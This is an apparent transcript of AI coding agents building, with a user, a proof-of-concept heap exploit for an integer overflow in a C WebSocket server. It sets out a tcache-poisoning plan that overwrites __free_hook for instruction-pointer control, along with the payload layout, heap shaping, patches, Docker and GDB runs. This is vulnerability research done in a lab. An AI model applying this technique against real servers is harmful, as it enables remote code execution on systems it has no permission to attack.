  7. Target the tcache->entries array of T1's own tcache struct — Even though T1 exits after the overflow, if we could overwrite T1's tcache entries BEFORE the free(msg_data) at line 1713, then free(msg_data) would use the corrupted tcache. But free() checks tcache->entries[tc_idx] to push to, it doesn't pop from it. Overwriting entries doesn't affect tcache_put behavior (it just sets e->next = tcache->entries[tc_idx] and tcache->entries[tc_idx] = e). So corrupting entries before a free just means the freed chunk gets linked to a corrupted list — but nobody pops from that list afterward.

Server Frame Processing Details

  • Server reads via next_byte() which buffers up to MESSAGE_LENGTH=2048 bytes from socket
  • All client frames MUST have MASK bit set (server reads 4 mask bytes unconditionally)
  • Binary frames (opcode 2) skip UTF-8 validation — use these for shaping and exploit
  • The overflow happens in read_single_frame BEFORE validate_utf8_txt is called
  • Control frames (PING/PONG/CLOSE) are allowed between non-FIN data frames — the opcode check at line 1611-1613 permits them
  • Frame format: byte0 (FIN+RSV+opcode), byte1 (MASK+length), optional extended length, 4-byte mask, payload
  • Extended length for 64-bit: bytes 2-9 are big-endian

Handshake Allocation Details (per connection)

In get_handshake_accept:

  1. calloc(1, 61) → 64-byte chunk → freed to tcache[2] (as str)
  2. base64_encode(hash, 20, NULL)malloc(31) → 48-byte chunk → returned as accept

In get_handshake_response: 3. malloc(130) → 144-byte chunk → returned as response 4. free(accept) → 48-byte chunk to tcache[1]

In do_handshake: 5. free(response) → 144-byte chunk to tcache[7]

Echo Path Allocation Details

For a message of size S bytes:

  • read_single_frame: malloc(S) → chunk of size request2size(S)
  • ws_sendframe_internal: malloc(2 + S + 1) for response (2-byte header for S≤125)
  • Both are freed: free(response) then free(msg)
  • request2size(S) = (S + 8 + 15) & ~15 on glibc 2.31 x86_64

Chunk Size / Tcache Index Reference (glibc 2.31 x86_64)

  • 32-byte chunk → tcache idx 0 (malloc 1-24)
  • 48-byte chunk → tcache idx 1 (malloc 25-40)
  • 64-byte chunk → tcache idx 2 (malloc 41-56)
  • 0x70 (112-byte) chunk → tcache idx 5 (malloc 97-111)
  • tcache capacity: 7 per bin

Heap Layout Notes

  • ws_connection structs are in static client_socks array (BSS), NOT on heap
  • ws_getaddress() returns pointer to client->ip (static buffer), does NOT strdup
  • close_client() only closes socket + destroys mutexes — no malloc/free
  • printf in onopen may allocate stdout buffer once (large, ~8192 bytes, never freed)
  • Thread arena allocated via mmap, heap starts at 0x7ffff0000000 range
  • tcache_perthread_struct (576 bytes → ~592-byte chunk) is the FIRST allocation on the thread arena heap
  • Libc mapped at 0x7ffff7d00000 range — ~2GB from the thread arena heap

Accomplished

Completed

  1. Created AGENTS.md at repo root — compact instruction file for future agent sessions
  2. Created tests/Dockerfile.poc — Ubuntu 20.04 image, builds echo server with all protections disabled
  3. Created tests/poc_rip_control.c — Full PoC client with TCP connect, WebSocket handshake, frame builder, heap shaping, two-frame exploit, two-connection mode, configurable overflow payload
  4. Created tests/poc_gdb.txt — GDB helper script with breakpoints at vulnerable code
  5. Created tests/poc_run.sh — Orchestration script with interactive and auto modes
  6. Built Docker image successfully (ws-poc)
  7. Ran initial reconnaissance — confirmed integer overflow, heap corruption (128 bytes past buffer), server survival via tcache, top chunk as adjacent chunk

In Progress / Blocked

The RIP control strategy is blocked. The previously planned tcache poisoning approach (from the first session's summary) was based on an incorrect assumption that tcache entries persist across threads. The deep analysis in this session conclusively showed that per-thread tcache makes cross-thread poisoning impossible with the echo server's architecture.

Next Steps (Priority Order)

Option A (simplest, recommended): Change the test server to single-threaded mode

  • Modify the echo server build to use .thread_loop = 1, which processes connections sequentially in the main thread
  • The main thread uses the main arena (not a thread arena), and there's only ONE tcache
  • All the original tcache poisoning logic works: overflow corrupts adjacent free chunk's fd → __free_hook, next malloc returns __free_hook, echo writes frame data to it, free(response) triggers __free_hook → RIP control
  • This requires updating Dockerfile.poc to build a single-threaded echo variant

Option B (no server changes, more complex): Concurrent connections + cross-thread tcache struct overwrite

  • Open connection 2 FIRST (so T2's tcache struct is allocated on the shared arena heap)
  • Shape heaps on both connections to place T2's tcache_perthread_struct adjacent to T1's overflow buffer
  • Overflow into T2's tcache struct, overwriting entries[X] with &__free_hook and counts[X] with non-zero
  • Connection 2's next malloc of that size returns &__free_hook
  • This requires very precise heap layout control and may need GDB-assisted discovery of T2's tcache struct address

Option C (no server changes, theoretical): Document the limitation

  • Keep the current PoC demonstrating heap corruption with controlled fd overwrite (0x41414141...)
  • Add a comment explaining that RIP control would require either single-threaded mode or a more complex server with additional allocation patterns
  • Less satisfying but honest

Once an approach is chosen, the implementation steps are:

  1. Update the overflow payload to target the specific exploitation primitive
  2. Update poc_rip_control.c (potentially remove two-connection mode if going single-threaded)
  3. Update poc_gdb.txt with breakpoints to verify the exploitation chain
  4. Rebuild Docker image
  5. Run and verify RIP control crash in GDB (show RIP = 0xXXXXXXXXXXXX2082 or similar controlled value)

Relevant files / directories

Created

  • AGENTS.md — repo instruction file (completed)
  • tests/Dockerfile.poc — Docker build environment (completed, may need update for single-threaded server)
  • tests/poc_rip_control.c — PoC client (completed, needs update for chosen exploitation strategy)
  • tests/poc_gdb.txt — GDB helper script (completed, may need update)
  • tests/poc_run.sh — orchestration script (completed, may need update)

Key existing files read

  • src/ws.cthe vulnerable file, especially:
    • Lines 1410-1552 (read_single_frame): the vulnerable integer overflow
    • Lines 1229-1247 (frame_state_data struct): field offsets
    • Lines 155-193 (ws_frame_data struct): huge struct with frm[2048] buffer
    • Lines 1565-1720 (next_complete_frame): frame dispatch loop, error path at line 1713 does free(fsd.msg_data)
    • Lines 1735-1808 (ws_establishconnection): connection loop, onclose after error, thread per connection
    • Lines 563-689 (ws_sendframe_internal): response allocation at line 636, frame header construction (bytes 0-1 are fixed: 0x82 + length for binary FIN)
    • Lines 1178-1195 (next_byte): reads from socket into 2048-byte buffer
    • Lines 1023-1072 (do_handshake): handshake flow, allocation/free order
  • src/handshake.c — handshake allocations: calloc(61) → 64-byte, base64_encodemalloc(31) → 48-byte, malloc(130) → 144-byte
  • src/base64.cbase64_encode: malloc(len*4/3+4+len/72+1) → for SHA1 (20 bytes): malloc(31) → 48-byte chunk
  • include/ws.h — constants: MAX_FRAME_LENGTH=16MB, MESSAGE_LENGTH=2048, MAX_CLIENTS=8
  • examples/echo/echo.c — target server, .thread_loop = 0 (threaded mode), onclose has no malloc, onmessage calls ws_sendframe_bcast
  • Makefile — build system (not directly used; Dockerfile.poc uses direct gcc invocations)

Ok so you can follow the Option A by setting threads to 1. We just want a PoC anyways.
zai-coding-plan
zai-coding-plan / glm-5.1
Step

Let me review the current files to build a precise plan.

zai-coding-plan
zai-coding-plan / glm-5.1
Step

Now let me check the echo server and the ws.h API for thread_loop:

zai-coding-plan
zai-coding-plan / glm-5.1
Step

Let me check how thread_loop = 1 works and how connections are processed:

zai-coding-plan
zai-coding-plan / glm-5.1
Step
zai-coding-plan
zai-coding-plan / glm-5.1
Step
continue
zai-coding-plan
zai-coding-plan / glm-5.1
Step
continue
zai-coding-plan
zai-coding-plan / glm-5.1
Step

OK, I've been deep in analysis. Here's the critical finding and the plan:

Key Discovery

thread_loop = 1 does NOT make the server single-threaded. It only controls whether the accept loop blocks the main thread. Each connection still gets its own pthread_create in ws_accept (line 1903). Per-thread tcache is still the problem.

We need to patch ws_accept to call ws_establishconnection directly instead of spawning a thread.

Exploitation Strategy (Single-Threaded)

With all code in one thread, there's one tcache, and it persists across connections. The attack:

Pre-connection heap setup (in main() before ws_socket()):

  • malloc(24) x3, then free() them in reverse order
  • Creates 3 adjacent free 32-byte chunks in tcache[0]: [c0, c1, c2], counts=3

Connection 1 — trigger overflow:

  1. malloc(16) → pops c0 → msg = c0
  2. tcache[0]: [c1, c2], counts=2
  3. Overflow writes into c1's chunk metadata: set fd = &__free_hook
  4. tcache[0]: [c1 → __free_hook], counts=2 (c2 orphaned)
  5. Error path: free(msg) → tcache[0]: [c0 → c1 → __free_hook], counts=3

Connection 2 — onopen drains 1 entry:

  • extra = malloc(24) → pops c0, NOT freed
  • tcache[0]: [c1 → __free_hook], counts=2

Connection 2 — echo triggers the chain:

  1. malloc(16) → pops c1 → counts=1
  2. malloc(19) → pops __free_hook → returns __free_hook as buffer!
  3. Server writes response frame to __free_hook → overwrites it with 0xPPPPPP0882
  4. free(response)__free_hook != NULL → calls 0xPPPPPP0882()SIGSEGV at controlled RIP

Files to Create/Modify

FileChange
tests/poc_echo.cNew: custom echo server with heap setup + extra malloc in onopen
tests/poc_single_thread.patchNew: patches ws.c to replace pthread_create with direct call
tests/Dockerfile.pocUpdate: apply patch, build poc_echo
tests/poc_rip_control.cUpdate: simplify, hardcode __free_hook address as overflow fd
tests/poc_gdb.txtUpdate: verify tcache chain, show __free_hook overwrite
tests/poc_run.shUpdate: simplified run command

Questions

Question· Address handling1 answered

The __free_hook address will be fixed (no ASLR) but depends on the exact libc in the Docker container. I'll determine it from GDB after building. For the overflow payload, should I hardcode it or make it configurable via -o flag?

Hardcode + -o override (Recommended)
Default to the known address from the Docker build, but allow override via -o for flexibility
Hardcode only
Simpler code, address determined once from GDB and baked in
Always via -o flag
No default, user must provide the address
zai-coding-plan
zai-coding-plan / glm-5.1
Step

Here's the complete plan:

Final Plan

1. tests/poc_single_thread.patch (NEW)

Patches ws.c lines 1900-1907: replace pthread_create+pthread_detach with direct ws_establishconnection(&client_socks[i]).

2. tests/poc_echo.c (NEW)

c
main():
  malloc(24) x3 → free in reverse → tcache[0] has 3 adjacent free chunks
  ws_socket({.thread_loop=0, .timeout_ms=0, ...})

onopen():
  static counter; on 2nd connection: malloc(24) (pops 1 tcache entry, leaked)

onmessage(): ws_sendframe_bcast (same as echo)
onclose(): empty

3. tests/Dockerfile.poc (UPDATE)

  • Apply patch before build
  • Build tests/poc_echo instead of examples/echo/echo
  • Keep all protection flags disabled

4. tests/poc_rip_control.c (UPDATE)

  • Remove shaping (-n, -s) and two-connection (-2) flags
  • Default overflow payload (32 bytes):
    • [0..7] prev_size = 0
    • [8..15] size = 0x21
    • [16..23] fd = hardcoded __free_hook address (LE)
    • [24..31] key = 0
  • Connection 1: send exploit, shutdown(SHUT_WR), sleep, close
  • Connection 2: handshake, send 8-byte message → server crashes
  • Keep -o flag to override overflow payload

5. tests/poc_gdb.txt (UPDATE)

  • Print __free_hook address at start
  • Breakpoint after overflow to show corrupted tcache chain
  • Breakpoint at free() inside ws_sendframe_internal to show __free_hook value
  • Show crash RIP

6. tests/poc_run.sh (UPDATE)

  • Auto mode: run poc_rip_control with no extra flags
  • Server runs poc_echo instead of examples/echo/echo

Build & Verify Flow

  1. Build Docker image
  2. Run in auto mode first to get GDB output with __free_hook address
  3. Hardcode the address in poc_rip_control.c
  4. Rebuild and verify: GDB shows RIP = 0xPPPPPP0882 (controlled value)

Expected GDB Output

__free_hook before: 0x0
__free_hook after:  0x4141414141410882  ← our data via echo response

Program received signal SIGSEGV
RIP: 0x4141414141410882  ← RIP CONTROL PROVEN

The first 2 bytes of __free_hook (0x82, 0x08) come from the WebSocket frame header, and bytes 2-7 (0x414141414141) come from our message payload — proving we control RIP.

Does this plan look good? Any changes before I implement?

Ok write the plan to a file.
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Creating plan
Create tests/poc_single_thread.patch
Create tests/poc_echo.c
Update tests/Dockerfile.poc
Update tests/poc_rip_control.c
Update tests/poc_gdb.txt
Update tests/poc_run.sh
Build Docker image and verify
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Now I'll create all the files. Let me start with the patch, then the new echo server, then update the existing files.

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Creating plan
Create tests/poc_single_thread.patch
Create tests/poc_echo.c
Update tests/Dockerfile.poc
Update tests/poc_rip_control.c
Update tests/poc_gdb.txt
Update tests/poc_run.sh
Build Docker image and verify
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Creating plan
Create tests/poc_single_thread.patch
Create tests/poc_echo.c
Update tests/Dockerfile.poc
Update tests/poc_rip_control.c
Update tests/poc_gdb.txt
Update tests/poc_run.sh
Build Docker image and verify
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Creating plan
Create tests/poc_single_thread.patch
Create tests/poc_echo.c
Update tests/Dockerfile.poc
Update tests/poc_rip_control.c
Update tests/poc_gdb.txt
Update tests/poc_run.sh
Build Docker image and verify
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Now let me rewrite poc_rip_control.c — simplified for the single-threaded attack:

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Creating plan
Create tests/poc_single_thread.patch
Create tests/poc_echo.c
Update tests/Dockerfile.poc
Update tests/poc_rip_control.c
Update tests/poc_gdb.txt
Update tests/poc_run.sh
Build Docker image and verify
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Creating plan
Create tests/poc_single_thread.patch
Create tests/poc_echo.c
Update tests/Dockerfile.poc
Update tests/poc_rip_control.c
Update tests/poc_gdb.txt
Update tests/poc_run.sh
Build Docker image and verify
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Creating plan
Create tests/poc_single_thread.patch
Create tests/poc_echo.c
Update tests/Dockerfile.poc
Update tests/poc_rip_control.c
Update tests/poc_gdb.txt
Update tests/poc_run.sh
Build Docker image and verify
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Now let me build the Docker image to verify everything compiles:

Build Docker image for PoC
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s

#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 ...

#3 [auth] library/ubuntu:pull token for registry-1.docker.io
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Patch formatting issue. Let me fix it:

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

The issue is likely tab/space mismatch. Let me check what whitespace the original file uses and use a diff-based approach instead:

Check whitespace in ws.c patch target
$ cd /home/lucas/Works/VibeCodedProjects/wsServer && cat -A src/ws.c | sed -n '1900,1910p'
^I^I/* Client socket added to socks list ? */$
^I^Iif (i != MAX_CLIENTS)$
^I^I{$
^I^I^Iif (pthread_create($
^I^I^I^I^I&client_thread, NULL, ws_establishconnection, &client_socks[i]))$
^I^I^I^Ipanic("Could not create the client thread!");$
$
^I^I^Ipthread_detach(client_thread);$
^I^I}$
^I^Ielse$
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

The file uses tabs. My patch had spaces. Let me generate a proper patch using diff:

Backup original ws.c
$ diff -u src/ws.c /dev/null > /dev/null; cp src/ws.c /tmp/ws_orig.c
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Edit/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c
/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c
Edit applied successfully.

LSP errors detected in this file, please fix:
<diagnostics file="/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c">
ERROR [51:10] 'utf8.h' file not found
</diagnostics>
{
  "/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
    {
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Generate proper patch from diff
$ diff -u /tmp/ws_orig.c src/ws.c > tests/poc_single_thread.patch
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Restore original ws.c
$ git checkout src/ws.c
Updated 1 path from the index
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Good, but the paths need to be relative for patch -p1. Let me fix that:

Edit/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_single_thread.patch
/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_single_thread.patch
Edit applied successfully.
{
  "/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
    {
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Now rebuild:

Rebuild Docker image with fixed patch
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1 | tail -30
#4 DONE 0.0s

#5 [internal] load build context
#5 transferring context: 73.58kB done
#5 DONE 0.0s

#6 [2/6] RUN apt-get update && apt-get install -y 	gcc make gdb python3 libc6-dbg patch
#6 CACHED

#7 [3/6] COPY . /wsServer
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Build succeeded. Let me verify the __free_hook address in the container:

Get __free_hook address from Docker container
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --name ws-poc-addr ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; cat > /tmp/hook.c << "EOF"
#include <stdio.h>
#include <malloc.h>
int main(void) { printf("__free_hook=%p\n", &__free_hook); return 0; }
EOF
gcc /tmp/hook.c -o /tmp/hook && /tmp/hook'
bash: /proc/sys/kernel/randomize_va_space: Read-only file system
/tmp/hook.c: In function 'main':
/tmp/hook.c:3:1: warning: '__free_hook' is deprecated [-Wdeprecated-declarations]
    3 | int main(void) { printf("__free_hook=%p\n", &__free_hook); return 0; }
      | ^~~
In file included from /tmp/hook.c:2:
/usr/include/malloc.h:145:38: note: declared here
  145 | extern void (*__MALLOC_HOOK_VOLATILE __free_hook) (void *__ptr,
      |                                      ^~~~~~~~~~~
__free_hook=0x555555558010
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Need --privileged for ASLR disable and -no-pie for the test binary:

Get __free_hook address with ASLR disabled
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; cat > /tmp/hook.c << "EOF"
#include <stdio.h>
#include <malloc.h>
int main(void) { printf("__free_hook=%p\n", &__free_hook); return 0; }
EOF
gcc -no-pie /tmp/hook.c -o /tmp/hook && /tmp/hook'
/tmp/hook.c: In function 'main':
/tmp/hook.c:3:1: warning: '__free_hook' is deprecated [-Wdeprecated-declarations]
    3 | int main(void) { printf("__free_hook=%p\n", &__free_hook); return 0; }
      | ^~~
In file included from /tmp/hook.c:2:
/usr/include/malloc.h:145:38: note: declared here
  145 | extern void (*__MALLOC_HOOK_VOLATILE __free_hook) (void *__ptr,
      |                                      ^~~~~~~~~~~
__free_hook=0x404030
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Let me get more libc addresses to verify:

Get multiple libc addresses for verification
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; cat > /tmp/hook.c << "EOF"
#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
int main(void) {
    printf("__free_hook=%p\n", &__free_hook);
    printf("system=%p\n", &system);
    printf("malloc=%p\n", &malloc);
    printf("free=%p\n", &free);
    printf("libc_start_main=%p\n", &__libc_start_main);
    return 0;
}
EOF
gcc -no-pie /tmp/hook.c -o /tmp/hook && /tmp/hook'
/tmp/hook.c: In function 'main':
/tmp/hook.c:5:5: warning: '__free_hook' is deprecated [-Wdeprecated-declarations]
    5 |     printf("__free_hook=%p\n", &__free_hook);
      |     ^~~~~~
In file included from /tmp/hook.c:3:
/usr/include/malloc.h:145:38: note: declared here
  145 | extern void (*__MALLOC_HOOK_VOLATILE __free_hook) (void *__ptr,
      |                                      ^~~~~~~~~~~
/tmp/hook.c:9:37: error: '__libc_start_main' undeclared (first use in this function)
    9 |     printf("libc_start_main=%p\n", &__libc_start_main);
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Get libc addresses
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; cat > /tmp/hook.c << "EOF"
#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
int main(void) {
    printf("__free_hook=%p\n", &__free_hook);
    printf("system=%p\n", &system);
    printf("malloc=%p\n", &malloc);
    printf("free=%p\n", &free);
    return 0;
}
EOF
gcc -no-pie /tmp/hook.c -o /tmp/hook && /tmp/hook'
/tmp/hook.c: In function 'main':
/tmp/hook.c:5:5: warning: '__free_hook' is deprecated [-Wdeprecated-declarations]
    5 |     printf("__free_hook=%p\n", &__free_hook);
      |     ^~~~~~
In file included from /tmp/hook.c:3:
/usr/include/malloc.h:145:38: note: declared here
  145 | extern void (*__MALLOC_HOOK_VOLATILE __free_hook) (void *__ptr,
      |                                      ^~~~~~~~~~~
__free_hook=0x404030
system=0x7ffff7e24290
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

The __free_hook is at 0x404030 (not 0x7ffff7f9de48 from the old threaded session). Let me verify this is the correct address for our server binary and update the PoC:

Verify __free_hook in actual poc_echo binary
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; gdb -batch -ex "start" -ex "p &__free_hook" -ex "p &__malloc_hook" -ex "p &system" -ex "p &exit" -ex "x/gx &__free_hook" ./tests/poc_echo 2>&1 | grep -E "(^\$|=|0x)"'
Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.

$1 = (void (**)(void *, const void *)) 0x7ffff7f9de48 <__free_hook>
$2 = (void *(**)(size_t, const void *)) 0x7ffff7f9bb70 <__malloc_hook>
$3 = (int (*)(const char *)) 0x7ffff7e01290 <__libc_system>
$4 = (void (*)(int)) 0x7ffff7df5a40 <__GI_exit>
0x7ffff7f9de48 <__free_hook>:	0x0000000000000000
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

The address 0x7ffff7f9de48 is correct for poc_echo. The PoC client already has the right value. Let me run the auto test:

Creating plan
Create tests/poc_single_thread.patch
Create tests/poc_echo.c
Update tests/Dockerfile.poc
Update tests/poc_rip_control.c
Update tests/poc_gdb.txt
Update tests/poc_run.sh
Build Docker image and verify
Run auto-mode test to verify exploit
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Run PoC in auto mode to test exploit
$ bash tests/poc_run.sh auto 2>&1
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s

#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 DONE 0.5s
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Check server GDB output
$ docker logs ws-poc-server 2>&1 | tail -60
Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Temporary breakpoint 1, main () at tests/poc_echo.c:97
97	{

=== LIBC ADDRESSES ===
__free_hook  = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

The breakpoints aren't hitting — the patch shifted line numbers. Let me check the actual line numbers in the patched ws.c:

Find actual line numbers after patch
$ docker run --rm --privileged ws-poc bash -c 'grep -n "frame_size += fsd->frame_length\|realloc(msg\|for (j = 0; j < fsd->frame_length\|free(fsd->msg_data)\|buf = malloc" src/ws.c | head -10'
1394:	free(fsd->msg_data);
1453:	*frame_size += fsd->frame_length;
1505:			tmp = realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin);
1536:			tmp = realloc(msg, *msg_idx + 1);
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Check actual line numbers in patched ws.c
$ docker run --rm --privileged ws-poc bash -c 'sed -n "1390,1400p;1505,1510p;1515,1520p;1524,1530p;1710,1715p" src/ws.c'
	 * vars here.
	 */
	wfd->frame_size = fsd->frame_size;
	wfd->frame_type = WS_FR_OP_CLSE;
	free(fsd->msg_data);
	return (0);
}

/**
 * @brief Reads the current frame isolating data from control frames.
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

The GDB output looks wrong — breakpoints aren't being hit. Let me debug this:

Debug GDB breakpoint issue
$ docker rm -f ws-poc-debug 2>/dev/null; docker run -d --name ws-poc-debug --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -ex "set pagination off" -ex "break ws.c:1453" -ex "break poc_echo.c:55" -ex "run" -ex "bt" ./tests/poc_echo 2>&1; echo "EXIT=\$?"' > /dev/null && sleep 3 && docker exec ws-poc-debug ./tests/poc_rip_control 2>&1; sleep 2 && docker logs ws-poc-debug 2>&1 | tail -40 && docker rm -f ws-poc-debug 2>/dev/null
[*] Connecting to 127.0.0.1:8080
[+] Handshake OK (connection 1)
[*] Sending exploit (f1sz=16, ovf=32 bytes)
[*] frame2 length = 0xfffffffffffffff5
[+] Sent 68 bytes (hdr=36, ovf=32)
Breakpoint 1 at 0x4030f9: file src/ws.c, line 1453.
Breakpoint 2 at 0x4016e5: file tests/poc_echo.c, line 55.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Found the issue — poc_run.sh has a redundant -ex 'run' that restarts the program mid-execution. Let me fix it:

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Edit/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_run.sh
/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_run.sh
Edit applied successfully.
{
  "/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
    {
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Also fix the interactive mode:

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Good, interactive mode doesn't have the -ex 'run' issue. Now let me also add set pagination off to the GDB script and remove it from the shell:

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Good, set pagination off is already at line 6. Now let me run the test again:

Run PoC auto test with fixed GDB
$ docker rm -f ws-poc-server 2>/dev/null; bash tests/poc_run.sh auto 2>&1
ws-poc-server
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s

#2 [auth] library/ubuntu:pull token for registry-1.docker.io
#2 DONE 0.0s
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Check why container exited early
$ docker logs ws-poc-server 2>&1 | tail -30
Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Temporary breakpoint 1, main () at tests/poc_echo.c:97
97	{

=== LIBC ADDRESSES ===
__free_hook  = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Simple GDB test with continue
$ docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; gdb -batch \
    -ex "set disable-randomization on" \
    -ex "set pagination off" \
    -ex "start" \
    -ex "p &__free_hook" \
    -ex "break ws.c:1453" \
    -ex "break poc_echo.c:67" \
    -ex "continue" \
    ./tests/poc_echo 2>&1' | tail -30


<bash_metadata>
bash tool terminated command after exceeding timeout 15000 ms. If this command is expected to take longer and is not waiting for interactive input, retry with a larger timeout value in milliseconds.
</bash_metadata>
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

The simple test shows the server runs fine. The issue is in poc_gdb.txt. Let me check:

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Missing the final continue at the end of the script:

Edit/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
Edit applied successfully.
{
  "/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
    {
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Run PoC auto test with fixed GDB script
$ docker rm -f ws-poc-server 2>/dev/null; bash tests/poc_run.sh auto 2>&1
ws-poc-server
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s

#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 DONE 0.4s
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Good, the client ran through both connections. Let me get the GDB output:

Get GDB server output
$ docker logs ws-poc-server 2>&1
Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Temporary breakpoint 1, main () at tests/poc_echo.c:97
97	{

=== LIBC ADDRESSES ===
__free_hook  = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

